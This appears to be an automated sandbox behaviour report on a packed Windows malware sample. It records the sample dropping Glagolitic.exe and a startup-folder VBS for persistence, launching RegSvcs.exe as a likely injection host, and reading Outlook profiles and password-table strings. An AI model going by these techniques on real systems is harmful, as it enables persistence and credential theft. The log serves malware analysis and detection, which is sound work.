              Source: C:\Users\user\Desktop\mKRflLn5sx.exeCode function: 0_2_0047839D CoInitialize,CoCreateInstance,CoUninitialize,0_2_0047839D
              Source: C:\Users\user\Desktop\mKRflLn5sx.exeCode function: 0_2_0043305F __swprintf,__swprintf,__wcsicoll,FindResourceW,LoadResource,LockResource,FindResourceW,LoadResource,SizeofResource,LockResource,CreateIconFromResourceEx,0_2_0043305F
              Source: C:\Users\user\Desktop\mKRflLn5sx.exeFile created: C:\Users\user\AppData\Local\crocJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMutant created: NULL
              Source: C:\Users\user\Desktop\mKRflLn5sx.exeFile created: C:\Users\user\AppData\Local\Temp\tilthsJump to behavior
              Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Glagolitic.vbs"
              Source: C:\Users\user\Desktop\mKRflLn5sx.exeFile read: C:\Users\desktop.iniJump to behavior
              Source: C:\Users\user\Desktop\mKRflLn5sx.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: RegSvcs.exe, 00000003.00000002.3309658145.000000000350D000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3309658145.00000000034CE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3309658145.00000000034BE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3309658145.0000000003501000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3309658145.00000000034DC000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.3309591385.0000000002D4E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.3309591385.0000000002D3F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.3309591385.0000000002D30000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.3309591385.0000000002D73000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.3309591385.0000000002D7F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: mKRflLn5sx.exeVirustotal: Detection: 63%
              Source: mKRflLn5sx.exeReversingLabs: Detection: 78%
              Source: C:\Users\user\Desktop\mKRflLn5sx.exeFile read: C:\Users\user\Desktop\mKRflLn5sx.exeJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\mKRflLn5sx.exe "C:\Users\user\Desktop\mKRflLn5sx.exe"
              Source: C:\Users\user\Desktop\mKRflLn5sx.exeProcess created: C:\Users\user\AppData\Local\croc\Glagolitic.exe "C:\Users\user\Desktop\mKRflLn5sx.exe"
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\mKRflLn5sx.exe"
              Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Glagolitic.vbs"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\croc\Glagolitic.exe "C:\Users\user\AppData\Local\croc\Glagolitic.exe"
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\croc\Glagolitic.exe"
              Source: C:\Users\user\Desktop\mKRflLn5sx.exeProcess created: C:\Users\user\AppData\Local\croc\Glagolitic.exe "C:\Users\user\Desktop\mKRflLn5sx.exe"Jump to behavior
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\mKRflLn5sx.exe"Jump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\croc\Glagolitic.exe "C:\Users\user\AppData\Local\croc\Glagolitic.exe" Jump to behavior
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\croc\Glagolitic.exe" Jump to behavior
              Source: C:\Users\user\Desktop\mKRflLn5sx.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\mKRflLn5sx.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Users\user\Desktop\mKRflLn5sx.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\mKRflLn5sx.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\mKRflLn5sx.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\Desktop\mKRflLn5sx.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\Desktop\mKRflLn5sx.exeSection loaded: wsock32.dllJump to behavior
              Source: C:\Users\user\Desktop\mKRflLn5sx.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\mKRflLn5sx.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\mKRflLn5sx.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\mKRflLn5sx.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\mKRflLn5sx.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\mKRflLn5sx.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\mKRflLn5sx.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exeSection loaded: wsock32.dllJump to behavior
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: mlang.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exeSection loaded: wsock32.dllJump to behavior
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\mKRflLn5sx.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
              Source: Binary string: wntdll.pdbUGP source: Glagolitic.exe, 00000002.00000003.873219780.0000000004720000.00000004.00001000.00020000.00000000.sdmp, Glagolitic.exe, 00000002.00000003.869410933.0000000004380000.00000004.00001000.00020000.00000000.sdmp, Glagolitic.exe, 00000005.00000003.985607309.0000000004600000.00000004.00001000.00020000.00000000.sdmp, Glagolitic.exe, 00000005.00000003.986640218.00000000047A0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdb source: Glagolitic.exe, 00000002.00000003.873219780.0000000004720000.00000004.00001000.00020000.00000000.sdmp, Glagolitic.exe, 00000002.00000003.869410933.0000000004380000.00000004.00001000.00020000.00000000.sdmp, Glagolitic.exe, 00000005.00000003.985607309.0000000004600000.00000004.00001000.00020000.00000000.sdmp, Glagolitic.exe, 00000005.00000003.986640218.00000000047A0000.00000004.00001000.00020000.00000000.sdmp
              Source: C:\Users\user\Desktop\mKRflLn5sx.exeCode function: 0_2_0040EBD0 LoadLibraryA,GetProcAddress,0_2_0040EBD0
              Source: C:\Users\user\Desktop\mKRflLn5sx.exeCode function: 0_2_00416CB5 push ecx; ret 0_2_00416CC8
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exeCode function: 2_2_00416CB5 push ecx; ret 2_2_00416CC8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_03119C30 push esp; retf 0313h3_2_03119D55
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exeCode function: 5_2_00416CB5 push ecx; ret 5_2_00416CC8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00E1891E pushad ; iretd 6_2_00E1891F
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00E18C2F pushfd ; iretd 6_2_00E18C30
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00E18DDF push esp; iretd 6_2_00E18DE0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_06522DBE pushfd ; retf 6_2_06522DC1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: C:\Users\user\Desktop\mKRflLn5sx.exeFile created: C:\Users\user\AppData\Local\croc\Glagolitic.exeJump to dropped file

              Boot Survival

              barindex
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Glagolitic.vbsJump to dropped file
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Glagolitic.vbsJump to behavior
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Glagolitic.vbsJump to behavior
              Source: C:\Users\user\Desktop\mKRflLn5sx.exeCode function: 0_2_0047A330 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_0047A330
              Source: C:\Users\user\Desktop\mKRflLn5sx.exeCode function: 0_2_00434418 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00434418
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exeCode function: 2_2_0047A330 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,2_2_0047A330
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exeCode function: 2_2_00434418 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,2_2_00434418
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exeCode function: 5_2_0047A330 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,5_2_0047A330
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exeCode function: 5_2_00434418 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,5_2_00434418
              Source: C:\Users\user\Desktop\mKRflLn5sx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
